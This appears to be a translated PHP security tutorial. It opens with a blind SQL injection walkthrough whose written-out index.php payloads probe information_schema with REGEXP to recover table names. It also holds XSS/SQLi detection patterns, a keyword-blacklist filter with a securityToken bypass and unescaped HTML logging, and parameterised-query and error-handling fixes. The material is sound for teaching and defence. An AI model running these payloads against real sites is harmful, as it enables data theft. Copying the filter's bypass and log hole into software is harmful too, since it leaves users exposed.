As is well known, in MySQL 5 and later the INFORMATION_SCHEMA database stores the names of every database, table and column. The attack therefore proceeds as follows:
1. Determine whether the first character of the first table name is in the range a-z; here Blind_sqli is assumed to be an already known database name.
Note: ^[a-z] in a regular expression means that the first character of the string lies in the range a-z.
The code is as follows:
```text
index.php?id=1 and 1=(SELECT 1 from information_schema.tables WHERE table_schema="Blind_sqli" and table_name REGEXP '^[a-z]' LIMIT 0,1)/*
```
2. Determine whether the first character is in the range a-n.
The code is as follows:
```text
index.php?id=1 and 1=(SELECT 1 from information_schema.tables WHERE table_schema="Blind_sqli" and table_name REGEXP '^[a-n]' LIMIT 0,1)/*
```
3. Determine whether the character is n.
The code is as follows:
```text
index.php?id=1 and 1=(SELECT 1 from information_schema.tables WHERE table_schema="Blind_sqli" and table_name REGEXP '^n' LIMIT 0,1)/*
```
4. The expression is then extended one character at a time, as follows.
The code is as follows:
```text
'^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE
```
This means the table name is news. To verify it you could use the regular expression '^news$', but that is not really necessary: simply test table_name = 'news' directly.
5. To guess the other tables, just move the LIMIT offset along (LIMIT 1,1 -> LIMIT 2,1, and so on); each following table can be found blindly in the same way.
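The probes above only work because the query behind index.php?id=1 splices the id into the SQL text. As an added example (not code from the original post), here is that string-concatenated form beside a validated, parameterised form, run against an in-memory SQLite database with constructed rows; sqlite_master stands in for information_schema and LIKE for REGEXP, both assumptions made for the demo.

```php
<?php
// Added example: vulnerable vs. hardened version of the id lookup.
// The 'news' table and its rows are constructed here so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO news (id, title) VALUES (1, 'first post'), (2, 'second post')");

// Vulnerable: whatever follows id= becomes part of the SQL text, so a boolean
// condition appended to it is evaluated by the database.
function titleVulnerable(PDO $db, string $id): ?string
{
    $row = $db->query("SELECT title FROM news WHERE id = " . $id)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// Hardened: refuse anything that is not an integer, then bind the value so the
// database receives it as data and never as SQL.
function titleSafe(PDO $db, string $id): ?string
{
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        return null;   // invalid id: no query is executed at all
    }
    $stmt = $db->prepare("SELECT title FROM news WHERE id = :id");
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// The step-1 probe from the walkthrough, adapted to SQLite's catalogue
// (assumption: sqlite_master instead of information_schema.tables, LIKE 'n%'
// instead of REGEXP '^n').
$probe = "1 and 1=(SELECT 1 FROM sqlite_master WHERE type='table' AND name LIKE 'n%' LIMIT 1)";

var_dump(titleVulnerable($db, "1"));
var_dump(titleVulnerable($db, $probe));   // the probe's condition is evaluated by the database
var_dump(titleSafe($db, "1"));
var_dump(titleSafe($db, $probe));         // rejected by validation before any SQL runs
```

With the parameterised form the attacker's input can only ever be compared as a value, so the character-by-character guessing above has nothing to act on.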
Example
The code is as follows (detection patterns, written as PCRE in single-quoted PHP strings):
```php
<?php
// Signature patterns for command execution, XSS and SQL injection attempts.
$Exec_commond   = '(\s|\S)*(EXEC(\s|\+)+(s|x)p\w+)(\s|\S)*';
$Simple_XSS     = '(\s|\S)*((%3C)|<)((%2f)|\/)*[a-z0-9%]+((%3e)|>)(\s|\S)*';
$Eval_XSS       = '(\s|\S)*((%65)|e)(\s)*((%76)|v)(\s)*((%61)|a)(\s)*((%6C)|l)(\s|\S)*';
$Image_XSS      = '(\s|\S)*((%3C)|<)((%69)|i|I|(%49))((%6d)|m|M|(%4D))((%67)|g|G|(%47))[^\n]+((%3e)|>)(\s|\S)*';
$Script_XSS     = '(\s|\S)*((%73)|s)(\s)*((%63)|c)(\s)*((%72)|r)(\s)*((%69)|i)(\s)*((%70)|p)(\s)*((%74)|t)(\s|\S)*';
$SQL_injection  = '(\s|\S)*((%27)|(\')|(%3d)|(=)|(\/)|(%2f)|(")|((%22)|(-|%2d){2})|(%23)|(%3b)|(;))+(\s|\S)*';
```
SQL attack filter code
The code is as follows:
```php
<?php
// Custom handler: print a short message and stop. Note that E_ERROR (fatal)
// errors are never delivered to a user handler; only non-fatal levels reach it.
function customError($errno, $errstr, $errfile, $errline)
{
    echo "<b>Error number:</b> [$errno], error on line $errline in $errfile<br/>";
    die();
}
set_error_handler("customError", E_ERROR);

// Blacklist patterns applied to GET, POST and cookie values (PCRE, used with /is).
$getfilter    = '\'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)';
$postfilter   = '\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)';
$cookiefilter = $postfilter;   // the cookie pattern is identical to the POST pattern

function stopAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq)
{
    if (is_array($StrFiltValue)) {
        $StrFiltValue = implode($StrFiltValue);
    }
    // Any request that carries a securityToken parameter skips the filter entirely.
    if (preg_match("/" . $ArrFiltReq . "/is", $StrFiltValue) == 1 && !isset($_REQUEST['securityToken'])) {
        // Note: the submitted data is written unescaped into an .htm file.
        slog("<br><br>Operation IP: " . $_SERVER["REMOTE_ADDR"]
            . "<br>Operation time: " . date("Y-m-d H:i:s")   // date() replaces the deprecated strftime()
            . "<br>Action page: " . $_SERVER["PHP_SELF"]
            . "<br>Submission method: " . $_SERVER["REQUEST_METHOD"]
            . "<br>Submitted parameter: " . $StrFiltKey
            . "<br>Submitted data: " . $StrFiltValue);
        print "result notice: illegal operation!";
        exit();
    }
}

foreach ($_GET as $key => $value) {
    stopAttack($key, $value, $getfilter);
}
foreach ($_POST as $key => $value) {
    stopAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key => $value) {
    stopAttack($key, $value, $cookiefilter);
}

// Append one record to an HTML log file next to the script.
function slog($logs)
{
    $toppath = "log.htm";
    $Ts = fopen($toppath, "a+");
    fputs($Ts, $logs . "\r\n");
    fclose($Ts);
}
?>
```
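To see what the filter above actually catches, the following added example (not from the original post) runs its $getfilter and $postfilter patterns over a few constructed request values: the step-1 probe from the walkthrough plus some ordinary user input. The sample values are made up here; the patterns are the post's own.

```php
<?php
// Added example: evaluate the post's blacklist patterns over constructed inputs.
$getfilter  = '\'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)';
$postfilter = '\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)';

// The same test stopAttack() performs, without the exit()/log side effects.
function isFlagged(string $pattern, string $value): bool
{
    return preg_match('/' . $pattern . '/is', $value) === 1;
}

$samples = [
    // the step-1 probe from the walkthrough
    '1 and 1=(SELECT 1 from information_schema.tables WHERE table_schema="Blind_sqli" and table_name REGEXP \'^[a-z]\' LIMIT 0,1)/*',
    // ordinary values a real user might submit (constructed)
    '1',
    "O'Brien",                               // the quote rule in $getfilter
    'please select one item from the list',  // (SELECT|DELETE).+?FROM, case-insensitive
    'brand new in box',                      // (and|or)\b.+?in: "and" inside "brand"
];

foreach (['GET' => $getfilter, 'POST' => $postfilter] as $where => $pattern) {
    foreach ($samples as $value) {
        printf("%-4s %-8s %s\n", $where, isFlagged($pattern, $value) ? 'BLOCKED' : 'allowed', $value);
    }
}
```

The ordinary values that get blocked show the cost of a keyword blacklist: it is at best a last line of defence and no replacement for the parameterised queries that stop the injection itself.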
Analysis
If you use this function, it bypasses PHP's standard error handling, so that the error handler you define (the one that calls die()) runs instead.
Second, if an error occurs before the registration code has executed, the user-defined handler is not yet installed, so it is not used for that error.
PHP thus has its own error handling mechanism: set_error_handler() takes over PHP's error handling, and trigger_error() raises an error explicitly.
The set_error_handler() function installs a user-defined error-handling function, i.e. the user's own way of handling errors at runtime. You first create the handler function and then set the error level it covers.
About the usage:
The code is as follows:
```php
<?php
// Print the error details and the PHP build, then stop the script.
function customError($errno, $errstr, $errfile, $errline)
{
    echo "<b>Error code:</b> [{$errno}] {$errstr}\r\n";
    echo "Error line: {$errline} file {$errfile}\r\n";
    echo "PHP version ", PHP_VERSION, " (", PHP_OS, ")\r\n";
    die();
}
set_error_handler("customError", E_ALL | E_STRICT);
```
Summary
When PHP encounters an error it reports the location of the script, the line number and the cause. Many people say this is no big deal, but the consequences of revealing the real path can be severe: to an intruder this information is very valuable, and in practice many servers currently have this problem. Some administrators simply set display_errors to Off in the PHP configuration, but that approach is too blunt. There are times when we genuinely need PHP's error output for debugging, and when an error occurs you may want to give the user an explanation, or even redirect to another page. With set_error_handler() these conflicting needs can be reconciled.
Yet this function is rarely used.
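A handler built on the set_error_handler() usage above that resolves exactly that tension, as an added example (not the post's code): the full detail, including the real path, goes to the server-side log, while the user sees only a generic message. The log path, the message text and the function name safeErrorHandler are assumptions.

```php
<?php
// Added example: log the real path and line server-side, show the user nothing specific.
error_reporting(E_ALL);
ini_set('display_errors', '0');                   // never let PHP print errors itself
ini_set('log_errors', '1');
ini_set('error_log', '/tmp/php-app-errors.log');  // assumed log path

function safeErrorHandler(int $errno, string $errstr, string $errfile, int $errline): bool
{
    // Full detail for the operator, including the script path, goes to the log only.
    error_log(sprintf('[%s] errno=%d %s in %s:%d (uri=%s ip=%s)',
        date('Y-m-d H:i:s'), $errno, $errstr, $errfile, $errline,
        $_SERVER['REQUEST_URI'] ?? 'cli', $_SERVER['REMOTE_ADDR'] ?? 'cli'));

    // The user only ever sees a generic message that reveals nothing about the server.
    if (in_array($errno, [E_USER_ERROR, E_RECOVERABLE_ERROR], true)) {
        http_response_code(500);
        echo 'An internal error occurred. Please try again later.';
        exit(1);
    }
    return true;   // warnings and notices are logged and execution continues
}
// No level mask here: fatal E_ERROR cannot reach a user handler anyway, so
// everything that can be handled is handled.
set_error_handler('safeErrorHandler');

// Demonstration: a notice and a user-level error raised with trigger_error().
trigger_error('example notice: configuration value missing', E_USER_NOTICE);
trigger_error('example fatal condition: database unavailable', E_USER_ERROR);
```

Because display_errors is off and the handler writes only to error_log, the path and line number that the summary warns about never appear in the response.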